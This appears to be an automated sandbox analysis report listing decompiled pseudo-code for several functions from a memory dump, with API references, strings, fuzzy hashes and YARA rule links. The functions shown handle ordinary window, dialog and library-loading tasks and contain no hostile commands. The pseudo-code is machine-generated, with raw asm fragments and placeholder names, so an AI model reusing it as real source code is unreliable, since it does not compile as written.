Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcpy_s
String ID: P
API String ID: 2001391462-3110715001
Opcode ID: 17ae604b8c1d463df3540fc176370693abd500bf533e3cdeeb088a125669ed28
Instruction ID: 7e3d87c95646ea970e106a9e8e351065c4ded02e430dd0798273d4462c1065a9
Opcode Fuzzy Hash: 17ae604b8c1d463df3540fc176370693abd500bf533e3cdeeb088a125669ed28
Instruction Fuzzy Hash: BE81E7B8E00209DFDB14CF94C484A9DB7B1FF89354F218159E919AB359CB34AD81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 100022A0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100022A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
				struct tagRECT _v20;
				int _v24;
				int _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr* _v92;
				void* __ebp;

				_v88 = __ecx;
				E100162C0(__ebx, _v88, __edi);
				_v28 = E100120DF(_v88, 0x3f5);
				_v24 = 0;
				if(_v28 != 0) {
					E100028C0(_v88 + 0x7c, E1001209C(_v28));
				}
				_v28 = 0;
				_v28 = E100120DF(_v88, 0x3f6);
				if(_v28 != 0) {
					GetClientRect( *(_v28 + 0x20),  &_v20);
					E1000AF80(_v28,  &_v20);
					 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x60))))();
					E1000AF3F(_v88,  &_v20);
					_v20.bottom = _v20.bottom + 0x96;
					_push(0x6a);
					_push(_v88);
					_push( &_v20);
					_push(0x50200042);
					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v88 + 0x80)) + 0x13c))))() != 0) {
						SendMessageA( *(_v88 + 0xa0), 0x14e, 0, 0);
						E100100A1(_v88 + 0x80, _v88 + 0x78);
						_v48 =  *((intOrPtr*)(_v88 + 0x7c));
						if(_v48 != 0) {
							_v52 =  *((intOrPtr*)( *((intOrPtr*)(_v88 + 0x78)) - 0xc));
							if(_v52 != 0) {
								_v92 = _v56;
								_v92 =  *((intOrPtr*)(_v88 + 0x7c));
								_v80 = _v88 + 0x78;
								_v64 =  *((intOrPtr*)( *_v80 - 0xc));
								_v68 =  *_v80;
								_v60 = E10002C40(_v68, _v64);
								if(_v60 == 0) {
									E100018F0();
								}
								_v84 = _v60;
								 *((intOrPtr*)( *((intOrPtr*)( *_v92 + 0x2c))))(_v92, _v84, 0, 0, 0, 0);
							}
						}
					}
				}
				return 1;
			}

0x100022a6
0x100022ac
0x100022be
0x100022c1
0x100022cc
0x100022dd
0x100022dd
0x100022e2
0x100022f6
0x100022fd
0x1000230e
0x1000231b
0x1000232b
0x10002334
0x10002342
0x10002345
0x1000234a
0x1000234e
0x1000234f
0x10002370
0x10002389
0x1000239f
0x100023aa
0x100023b1
0x100023bc
0x100023c3
0x100023c8
0x100023d1
0x100023da
0x100023e5
0x100023ed
0x10002400
0x10002407
0x10002409
0x10002409
0x10002411
0x1000242c
0x1000242c
0x100023c3
0x100023b1
0x10002370
0x10002436

APIs

Part of subcall function 100120DF: GetDlgItem.USER32 ref: 100120F0

GetClientRect.USER32 ref: 1000230E
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 10002389

Strings

n^t, xrefs: 1000230E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientItemMessageRectSend
String ID: n^t
API String ID: 4076810758-440804003
Opcode ID: 13a1215f8cebd68168a304f0d6532a01a06166b84a3b36c29a286faa27a07e44
Instruction ID: b8f252689d46f13fa885f454a2cf16724a92795144e0ff45f9aa0d0c1906d716
Opcode Fuzzy Hash: 13a1215f8cebd68168a304f0d6532a01a06166b84a3b36c29a286faa27a07e44
Instruction Fuzzy Hash: 4B519474E00209DFDB04DBD4C995BAEB7B5FF88304F208119E506AB399DB74AD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1002A7CF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002A7CF(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t26;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				void* _t40;
				intOrPtr _t41;
				signed int _t42;
				void* _t43;

				_t39 = __ecx;
				_t43 = __ecx;
				_t26 = E1001F13B(_t36, __ecx, _t40, __ecx, __eflags);
				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
				if(_a4 != 0) {
					_t42 = _a8;
					__eflags =  *(__ecx + 0x3c) & _t42;
					if(__eflags == 0) {
						 *((intOrPtr*)(E1001F108(_t36, _t42, __ecx, __eflags) + 0x38)) = 0x1002a7bb;
						_t24 = _t43 + 0x3c;
						 *_t24 =  *(_t43 + 0x3c) | _t42;
						__eflags =  *_t24;
					}
				} else {
					_t37 = _a8;
					if(( *(__ecx + 0x3c) & _t37) != 0) {
						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
							E1000D657(_t39, _t49, 1);
						}
						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
							E10041630(_t41,  &_v52, 0, 0x30);
							_t32 =  *((intOrPtr*)(_t43 + 0x20));
							_v44 = _t32;
							_v40 = _t32;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
						}
						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
					}
				}
				return 1;
			}

0x1002a7cf
0x1002a7da
0x1002a7dc
0x1002a7e5
0x1002a7e8
0x1002a84a
0x1002a84d
0x1002a850
0x1002a857
0x1002a85e
0x1002a85e
0x1002a85e
0x1002a85e
0x1002a7ea
0x1002a7ea
0x1002a7f0
0x1002a7f2
0x1002a7f5
0x1002a7f9
0x1002a7f9
0x1002a800
0x1002a810
0x1002a815
0x1002a81b
0x1002a81e
0x1002a82f
0x1002a836
0x1002a83d
0x1002a83d
0x1002a845
0x1002a845
0x1002a7f0
0x1002a868

APIs

_memset.LIBCMT ref: 1002A810
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 1002A83D

Part of subcall function 1000D657: SendMessageA.USER32(?,00000401,00000000,00000000), ref: 1000D67C
Part of subcall function 1000D657: GetKeyState.USER32(00000001), ref: 1000D691

Strings

,, xrefs: 1002A82F

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$State_memset
String ID: ,
API String ID: 930327405-3772416878
Opcode ID: 3557fce5ecf9554f9529995d030b385679731b700ba33f0fb3b28425d8df065e
Instruction ID: 82a6069c8614467758bc7abd5ecad7f8906b390d03fe140b62c1e72327089565
Opcode Fuzzy Hash: 3557fce5ecf9554f9529995d030b385679731b700ba33f0fb3b28425d8df065e
Instruction Fuzzy Hash: 1011C131900304AFE710DFA1E881B9AB7F4FF45760F51401AE945AB581EBB1E885CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001E132, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001E132(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct tagRECT _v20;
				int _t25;
				void* _t42;

				_t42 = __ecx;
				 *(__ecx + 0x5c) =  *(__ecx + 0x5c) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x60)) = _a4;
				 *((intOrPtr*)(__ecx + 0x64)) = _a8;
				if( *((intOrPtr*)(__ecx + 0x20)) != 0 && (E10012193(__ecx) & 0x00300000) != 0) {
					E1000D7FA(__ecx, 0, 0, 1);
					E1000D7FA(__ecx, 1, 0, 1);
					E1000D8C5(__ecx, 3, 0);
				}
				GetClientRect( *(_t42 + 0x20),  &_v20);
				_t25 = _v20.right - _v20.left;
				 *(_t42 + 0x68) = _t25;
				 *((intOrPtr*)(_t42 + 0x6c)) = _v20.bottom - _v20.top;
				if( *(_t42 + 0x20) != 0) {
					E1001DABF(_t42);
					_t25 = InvalidateRect( *(_t42 + 0x20), 0, 1);
				}
				return _t25;
			}

0x1001e13e
0x1001e140
0x1001e145
0x1001e14d
0x1001e153
0x1001e167
0x1001e173
0x1001e17d
0x1001e17d
0x1001e189
0x1001e195
0x1001e19b
0x1001e19e
0x1001e1a4
0x1001e1a8
0x1001e1b3
0x1001e1b3
0x1001e1bc

APIs

GetClientRect.USER32 ref: 1001E189
InvalidateRect.USER32(?,00000000,00000001), ref: 1001E1B3

Part of subcall function 10012193: GetWindowLongA.USER32 ref: 1001219E

Part of subcall function 1000D7FA: SetScrollPos.USER32 ref: 1000D823

Strings

n^t, xrefs: 1001E189

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$ClientInvalidateLongScrollWindow
String ID: n^t
API String ID: 2076638976-440804003
Opcode ID: 8dfe691573b3f5176d58ca7e848b83280f4556ee5b9d8adf2cae35b490e99212
Instruction ID: 64fd46e939a9920de818ae65cd51cc6d4ccae989accd6e55f61f9291f5a5774a
Opcode Fuzzy Hash: 8dfe691573b3f5176d58ca7e848b83280f4556ee5b9d8adf2cae35b490e99212
Instruction Fuzzy Hash: 80112A31600714ABDB21EB69C845E9FBBF9FF88B10F00061EB496A6295DBB1A941CA50

Uniqueness

Uniqueness Score: -1.00%

Function 10019FAF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E10019FAF(void* __ecx) {
				signed int _v8;
				char _v20;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				long _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t29;
				signed int _t34;

				_t32 = _t34;
				_t9 =  *0x1006d940; // 0xc2bf211
				_v8 = _t9 ^ _t34;
				_t12 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t12 == 0) {
					L4:
					_t13 = 0;
					__eflags = 0;
				} else {
					_t38 = _t12 - 0x104;
					if(_t12 == 0x104) {
						goto L4;
					} else {
						 *(PathFindExtensionA( &_v280)) = 0;
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_t13 = E10019D40(_t19,  &_v20, "%s%s.dll", _t38,  &_v20,  &_v280);
						_t25 = _t25;
					}
				}
				_pop(_t29);
				return E1003F29E(_t13, _t19, _v8 ^ _t32, _t24, _t25, _t29);
			}

0x10019fb2
0x10019fba
0x10019fc1
0x10019fd7
0x10019fdf
0x1001a014
0x1001a014
0x1001a014
0x10019fe1
0x10019fe1
0x10019fe3
0x00000000
0x10019fe5
0x10019ff3
0x10019ffe
0x1001a005
0x1001a00b
0x1001a00c
0x1001a011
0x1001a011
0x10019fe3
0x1001a01b
0x1001a022

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10019FD7
PathFindExtensionA.SHLWAPI(?), ref: 10019FED

Part of subcall function 10019D40: __EH_prolog3_GS.LIBCMT ref: 10019D4A
Part of subcall function 10019D40: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1001A011,?,?), ref: 10019D7A
Part of subcall function 10019D40: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10019D8E
Part of subcall function 10019D40: ConvertDefaultLocale.KERNEL32(?), ref: 10019DCA
Part of subcall function 10019D40: ConvertDefaultLocale.KERNEL32(?), ref: 10019DD8
Part of subcall function 10019D40: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10019DF5
Part of subcall function 10019D40: ConvertDefaultLocale.KERNEL32(?), ref: 10019E20
Part of subcall function 10019D40: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10019E29
Part of subcall function 10019D40: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10019EDE

Strings

%s%s.dll, xrefs: 10019FF6

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 57bf9b2f1274a407c2fc71d895ea4d2be3971c8f0a620cb14aa9d56dcb9771fd
Instruction ID: 494489f4be5bb8fa0e7571c3592d42ab50ef1ee48b8b5176f233dc4034ac66cc
Opcode Fuzzy Hash: 57bf9b2f1274a407c2fc71d895ea4d2be3971c8f0a620cb14aa9d56dcb9771fd
Instruction Fuzzy Hash: 0201A472900128AFDB15DB68DC45AEF77F8EB4D700F0104A5E905EB151EA74EE84CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 10015649, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E10015649(void* __ecx, void* __edi) {
				signed short _v16;
				signed short _v20;
				char _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t7;
				void* _t18;
				intOrPtr* _t19;
				void* _t24;
				signed int _t25;

				_t7 =  *0x1006c780; // 0xffffffff
				_t32 = _t7 - 0xffffffff;
				if(_t7 != 0xffffffff) {
					return _t7;
				}
				_push(_t18);
				_push(_t24);
				_t19 = GetProcAddress(E1000E934( *((intOrPtr*)( *((intOrPtr*)(E1001F108(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
				_t25 = 0x40000;
				if(_t19 != 0) {
					E10041630(__edi,  &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t19() >= 0) {
						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1006c780 = _t25;
				return _t25;
			}

0x1001564e
0x10015656
0x10015659
0x100156bc
0x100156bc
0x1001565b
0x1001565c
0x10015678
0x1001567a
0x10015681
0x1001568b
0x10015696
0x10015697
0x100156a2
0x100156af
0x100156af
0x100156a2
0x100156b1
0x00000000

APIs

Part of subcall function 1000E934: GetModuleHandleA.KERNEL32(?,?,1000EA23,InitCommonControlsEx,00000000,?,1000F2F7,00080000,00008000,?,?,10011FCA,?,00080000,?), ref: 1000E942
Part of subcall function 1000E934: LoadLibraryA.KERNEL32(?,?,1000EA23,InitCommonControlsEx,00000000,?,1000F2F7,00080000,00008000,?,?,10011FCA,?,00080000,?), ref: 1000E952

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 10015672
_memset.LIBCMT ref: 1001568B

Strings

DllGetVersion, xrefs: 1001566C

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc_memset
String ID: DllGetVersion
API String ID: 3385804498-2861820592
Opcode ID: 06557b8acf6b76119efc71f1af51fc235080536be1631cb77b64a6663aa7a447
Instruction ID: 1f31602423521737d4bb13e2ab704d95095ca3550d89accf84cca2e9f84e28d0
Opcode Fuzzy Hash: 06557b8acf6b76119efc71f1af51fc235080536be1631cb77b64a6663aa7a447
Instruction Fuzzy Hash: 98F08172E01229ABE700DBAC9C85BAA73E8EB04755F510131FA14FB291D770DD0487A5

Uniqueness

Uniqueness Score: -1.00%

Function 10006840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006840(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* __ebp;
				void* _t25;
				void* _t33;
				void* _t34;

				if(_a8 == 0x110) {
					_v12 = _a16;
					_v8 =  *((intOrPtr*)(_v12 + 0x18));
					_t38 = _v8;
					if(_v8 != 0) {
						SetWindowPos(_a4, 0,  *(_v8 + 8),  *(_v8 + 0xc), 0, 0, 5);
					}
					SetWindowTextA(_a4, "Choose a Foreground Color");
					_v16 = _v8;
					E1000932A(_t25, _t33, _t34, _t38, _v16);
				}
				return 0;
			}

0x1000684d
0x10006852
0x1000685b
0x1000685e
0x10006862
0x1000687e
0x1000687e
0x1000688d
0x10006896
0x1000689d
0x100068a2
0x100068aa

APIs

SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005), ref: 1000687E
SetWindowTextA.USER32(?,Choose a Foreground Color), ref: 1000688D

Strings

Choose a Foreground Color, xrefs: 10006884

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Text
String ID: Choose a Foreground Color
API String ID: 848690642-450257381
Opcode ID: d8f0844a1f1981fcfad0d1e803e140d83a5bb5854f28885b699f646b2d69f5d1
Instruction ID: 55519a321e2b62b589f9a1d08e46b314f0a12e20486038af68574316e22ce6b9
Opcode Fuzzy Hash: d8f0844a1f1981fcfad0d1e803e140d83a5bb5854f28885b699f646b2d69f5d1
Instruction Fuzzy Hash: DD01DA79A00208EFEB04CF94D885F9EB7B5EB48310F208658F90597280D675AE40DF91

Uniqueness

Uniqueness Score: -1.00%

Function 1002715C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1002715C(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t18 = __ebx;
				_t7 =  *0x1006d940; // 0xc2bf211
				_v8 = _t7 ^ _t26;
				_t25 = _a4;
				if(_t25 != 0) {
					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameA(_t25,  &_v20, 0xa);
						_t16 = E1000D4C9( &_v20, "combobox");
						asm("sbb eax, eax");
						_t11 =  ~_t16 + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E1003F29E(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x1002715c
0x1002715c
0x1002715c
0x10027164
0x1002716b
0x1002716f
0x10027174
0x10027189
0x00000000
0x1002718b
0x10027192
0x100271a1
0x100271a9
0x100271ac
0x100271ac
0x10027176
0x10027176
0x10027176
0x10027176
0x100271b9

APIs

GetWindowLongA.USER32 ref: 1002717D
GetClassNameA.USER32(00000000,?,0000000A), ref: 10027192

Strings

combobox, xrefs: 1002719B

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLongNameWindow
String ID: combobox
API String ID: 1147815241-2240613097
Opcode ID: 4525c09068a3bdf4b9a319e2894bda5d376dc5a3322eb199f0a66168714ef64c
Instruction ID: 310a2f566248290fb6466b385e15e4de68efd8085674ae6e5b959ca0dea57109
Opcode Fuzzy Hash: 4525c09068a3bdf4b9a319e2894bda5d376dc5a3322eb199f0a66168714ef64c
Instruction Fuzzy Hash: E6F0F032911529AFDB01EF68DC45DAF73E8FF05360B50051AE826E7080DB30B9058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002A884, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1002A884(void* __ecx, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t12;
				void* _t14;
				void* _t17;
				_Unknown_base(*)()* _t19;
				void* _t20;

				_push(0);
				E10041CAB(0x10053434, _t14, _t17, __esi);
				if(( *0x100945bc & 0x00000001) == 0) {
					 *0x100945bc =  *0x100945bc | 0x00000001;
					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
					_push("UxTheme.dll");
					 *0x100945b8 = E1000D397(_t14, __ecx, _t17, __esi,  *(_t20 - 4));
				}
				_t9 =  *0x100945b8; // 0x0
				_t19 =  *(_t20 + 0xc);
				if(_t9 != 0) {
					_t12 = GetProcAddress(_t9,  *(_t20 + 8));
					if(_t12 != 0) {
						_t19 = _t12;
					}
				}
				return E10041D83(_t19);
			}

0x1002a884
0x1002a88b
0x1002a897
0x1002a899
0x1002a8a0
0x1002a8a4
0x1002a8af
0x1002a8af
0x1002a8b4
0x1002a8b9
0x1002a8be
0x1002a8c4
0x1002a8cc
0x1002a8ce
0x1002a8ce
0x1002a8cc
0x1002a8d7

APIs

__EH_prolog3.LIBCMT ref: 1002A88B
GetProcAddress.KERNEL32(00000000,?), ref: 1002A8C4

Strings

UxTheme.dll, xrefs: 1002A8A4

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressH_prolog3Proc
String ID: UxTheme.dll
API String ID: 3325816569-352951104
Opcode ID: efe9a331e1d40c58f743ccba3412ce66541280ce0300d879fd2d2686906c6e3c
Instruction ID: d46d6a9d265a72c20d3c8a7bb9ff04afb9b5d1827d5db2ee66bd8e74f9a88088
Opcode Fuzzy Hash: efe9a331e1d40c58f743ccba3412ce66541280ce0300d879fd2d2686906c6e3c
Instruction Fuzzy Hash: 0BE09235A006645BEB4ADBB59D45B8C7BE4FB04390F534059F808D7292CF74EA848F58

Uniqueness

Uniqueness Score: -1.00%

Function 10026F7B, Relevance: 5.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026F7B(signed int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t9;
				signed int _t10;
				void* _t13;
				intOrPtr* _t14;

				_t10 = _a4;
				_t15 = _t10 - 0x11;
				if(_t10 >= 0x11) {
					_t4 = E1000A5CD(_t7, _t9, _t10, _t13, _t15);
				}
				if( *0x10094320 == 0) {
					_t4 = E10026F57();
				}
				_t14 = 0x100944d8 + _t10 * 4;
				if( *_t14 == 0) {
					EnterCriticalSection(0x100944c0);
					if( *_t14 == 0) {
						_t4 = 0x10094328 + _t10 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t14 =  *_t14 + 1;
					}
					LeaveCriticalSection(0x100944c0);
				}
				EnterCriticalSection(0x10094328 + _t10 * 0x18);
				return _t4;
			}

0x10026f83
0x10026f86
0x10026f89
0x10026f8b
0x10026f8b
0x10026f97
0x10026f99
0x10026f99
0x10026fa4
0x10026fae
0x10026fb5
0x10026fba
0x10026fc1
0x10026fc7
0x10026fcd
0x10026fcd
0x10026fd4
0x10026fd4
0x10026fe4
0x10026fea

APIs

EnterCriticalSection.KERNEL32(100944C0,00000000,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FB5
InitializeCriticalSection.KERNEL32(?,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FC7
LeaveCriticalSection.KERNEL32(100944C0,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FD4
EnterCriticalSection.KERNEL32(?,00000000,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FE4

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

